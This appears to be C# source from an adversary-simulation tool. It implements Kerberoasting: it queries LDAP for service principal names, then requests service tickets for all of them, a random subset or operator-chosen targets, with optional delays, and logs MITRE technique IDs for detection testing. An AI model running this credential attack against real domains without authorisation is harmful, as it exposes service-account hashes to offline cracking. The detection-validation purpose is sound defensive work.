/// <summary>
/// Runs the Kerberoasting simulation and records its progress in a log file
/// located under the application's base directory.
/// </summary>
/// <param name="log">
/// Log file name. It is concatenated to the base directory without any
/// normalization, so callers should pass a plain file name rather than a path.
/// </param>
/// <param name="sleep">
/// Seconds to wait after each ticket request; 0 or a negative value disables the wait.
/// </param>
/// <remarks>
/// Any exception raised while enumerating or requesting tickets is handed to
/// <c>logger.SimulationFailed</c> instead of propagating, so a failure part-way
/// through leaves the remaining entries unprocessed.
/// NOTE(review): each request presumably shows up on domain controllers as a
/// Kerberos service ticket event (Event ID 4769) when "Audit Kerberos Service
/// Ticket Operations" is enabled - confirm the audit policy before using this
/// run to validate a detection.
/// </remarks>
public static void Kerberoasting(string log, int sleep = 0)
{
    Lib.Logger logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);

    // "T1208" is the technique id MITRE originally assigned to Kerberoasting; it was
    // later superseded by T1558.003. It is written to the log, so it is kept verbatim.
    logger.SimulationHeader("T1208");

    bool throttled = sleep > 0;
    if (throttled)
    {
        Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
    }

    try
    {
        List<String> found = Ldap.GetSPNs();
        foreach (String entry in found)
        {
            // Each entry is a '#'-delimited pair; both halves are forwarded unchanged.
            string[] fields = entry.Split('#');
            Lib.SharpRoast.GetDomainSPNTicket(fields[0], fields[1], "", "", logger);

            if (!throttled)
            {
                continue;
            }

            Thread.Sleep(sleep * 1000);
        }

        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Runs the Kerberoasting simulation (logged as technique T1558.003) and writes
/// its progress to a log file located under the application's base directory.
/// </summary>
/// <param name="log">
/// Log file name. It is concatenated to the base directory without any
/// normalization, so callers should pass a plain file name rather than a path.
/// </param>
/// <param name="sleep">
/// Seconds to wait after each service ticket request; 0 or a negative value
/// disables the wait.
/// </param>
/// <remarks>
/// Exceptions raised during enumeration or ticket requests are passed to
/// <c>logger.SimulationFailed</c> and do not propagate; the first failure ends
/// the run.
/// NOTE(review): spacing the requests changes how many land inside a given time
/// window, so threshold-based detections are presumably worth validating with
/// both zero and non-zero <paramref name="sleep"/> values - confirm with the
/// detection owner.
/// </remarks>
public static void Kerberoasting(string log, int sleep)
{
    string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
    Lib.Logger logger = new Lib.Logger(logPath);
    logger.SimulationHeader("T1558.003");

    bool throttled = sleep > 0;
    if (throttled)
    {
        string notice = String.Format("Sleeping {0} seconds between each service ticket request", sleep);
        logger.TimestampInfo(notice);
    }

    try
    {
        List<String> found = Ldap.GetSPNs();
        foreach (String entry in found)
        {
            // Each entry is a '#'-delimited pair; both halves are forwarded unchanged.
            string[] fields = entry.Split('#');
            string first = fields[0];
            string second = fields[1];
            Lib.SharpRoast.GetDomainSPNTicket(first, second, "", "", logger);

            if (throttled)
            {
                Thread.Sleep(sleep * 1000);
            }
        }

        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Console-only variant of the Kerberoasting simulation: announces the run on
/// standard output and requests a ticket for every entry returned by
/// <c>Ldap.GetSPNs</c>.
/// </summary>
/// <param name="sleep">
/// Seconds to wait after each request; 0 or a negative value disables the wait.
/// </param>
/// <remarks>
/// This overload writes no log file and has no exception handling of its own,
/// so any failure during enumeration or a ticket request propagates to the
/// caller and leaves no simulation record behind.
/// </remarks>
public static void Kerberoasting(int sleep = 0)
{
    Console.WriteLine("[*] Starting Kerberoast attack from {0}", Environment.MachineName);

    bool throttled = sleep > 0;
    if (throttled)
    {
        Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
    }

    List<String> found = Ldap.GetSPNs();
    foreach (String entry in found)
    {
        // Each entry is a '#'-delimited pair; both halves are forwarded unchanged.
        string[] fields = entry.Split('#');
        SharpRoast.GetDomainSPNTicket(fields[0], fields[1], "", "");

        if (!throttled)
        {
            continue;
        }

        Thread.Sleep(sleep * 1000);
    }
}
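/// <summary>
/// Runs the Kerberoasting simulation (logged as technique T1558.003) as described
/// by a playbook task and writes its progress to a log file located under the
/// application's base directory.
/// </summary>
/// <param name="playbook_task">
/// Task settings. <c>variation</c> selects the target set: 1 = every entry
/// returned by <c>Ldap.GetSPNs</c>, 2 = <c>user_target_total</c> entries drawn
/// at random from that list (the same entry can be drawn more than once),
/// 3 = the entries listed in <c>user_targets</c>. <c>task_sleep</c> is the
/// number of seconds to wait after each request; 0 or less disables the wait.
/// </param>
/// <param name="log">
/// Log file name. It is concatenated to the base directory without any
/// normalization, so callers should pass a plain file name rather than a path.
/// </param>
/// <remarks>
/// Every exception raised inside the run is passed to
/// <c>logger.SimulationFailed</c> and does not propagate; the first failure ends
/// the run.
/// NOTE(review): each request presumably shows up on domain controllers as a
/// Kerberos service ticket event (Event ID 4769) when "Audit Kerberos Service
/// Ticket Operations" is enabled - confirm the audit policy before using this
/// run to validate a detection.
/// </remarks>
public static void Kerberoasting(PlaybookTask playbook_task, string log)
{
    string currentPath = AppDomain.CurrentDomain.BaseDirectory;
    Logger logger = new Logger(currentPath + log);
    logger.SimulationHeader("T1558.003");
    List<String> servicePrincipalNames;

    if (playbook_task.task_sleep > 0)
    {
        logger.TimestampInfo(String.Format("Sleeping {0} seconds between each service ticket request", playbook_task.task_sleep));
    }

    try
    {
        logger.TimestampInfo(String.Format("Querying LDAP for Service Principal Names..."));
        servicePrincipalNames = Ldap.GetSPNs();
        logger.TimestampInfo(String.Format("Found {0} SPNs", servicePrincipalNames.Count));

        if (playbook_task.variation == 1)
        {
            logger.TimestampInfo(String.Format("Requesting a service ticket for all the {0} identified SPNs", servicePrincipalNames.Count));
            foreach (String spn in servicePrincipalNames)
            {
                RequestTicketForEntry(spn, playbook_task, logger);
            }
            logger.SimulationFinished();
        }
        else if (playbook_task.variation == 2)
        {
            // Random.Next(0) returns 0, so an empty list used to fail with an
            // unrelated index error; report the real cause in the log instead.
            if (playbook_task.user_target_total > 0 && servicePrincipalNames.Count == 0)
            {
                throw new InvalidOperationException("No SPNs were returned by LDAP, so no random targets can be selected");
            }

            // System.Random is sufficient: the draw only picks simulation targets
            // and protects no secret.
            var random = new Random();
            logger.TimestampInfo(String.Format("Requesting a service ticket for {0} random SPNs", playbook_task.user_target_total));
            for (int i = 0; i < playbook_task.user_target_total; i++)
            {
                int index = random.Next(servicePrincipalNames.Count);
                RequestTicketForEntry(servicePrincipalNames[index], playbook_task, logger);
            }
            logger.SimulationFinished();
        }
        else if (playbook_task.variation == 3)
        {
            logger.TimestampInfo(String.Format("Requesting a service ticket for {0} defined SPNs", playbook_task.user_targets.Length));
            foreach (string spn in playbook_task.user_targets)
            {
                RequestTicketForEntry(spn, playbook_task, logger);
            }
            logger.SimulationFinished();
        }
        // NOTE(review): any other variation value falls through without logging
        // either SimulationFinished or SimulationFailed - confirm that is intended.
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}

// Validates one '#'-delimited entry, forwards its two halves to SharpRoast, then applies the task's wait.
private static void RequestTicketForEntry(string entry, PlaybookTask playbook_task, Logger logger)
{
    string[] fields = entry.Split('#');
    if (fields.Length < 2)
    {
        // Entries from user_targets are operator-supplied; name the malformed
        // value rather than surfacing a bare index-out-of-range error.
        throw new FormatException(String.Format("Expected a '#'-delimited entry but got '{0}'", entry));
    }

    SharpRoast.GetDomainSPNTicket(fields[0], fields[1], "", "", logger);

    if (playbook_task.task_sleep > 0)
    {
        Thread.Sleep(playbook_task.task_sleep * 1000);
    }
}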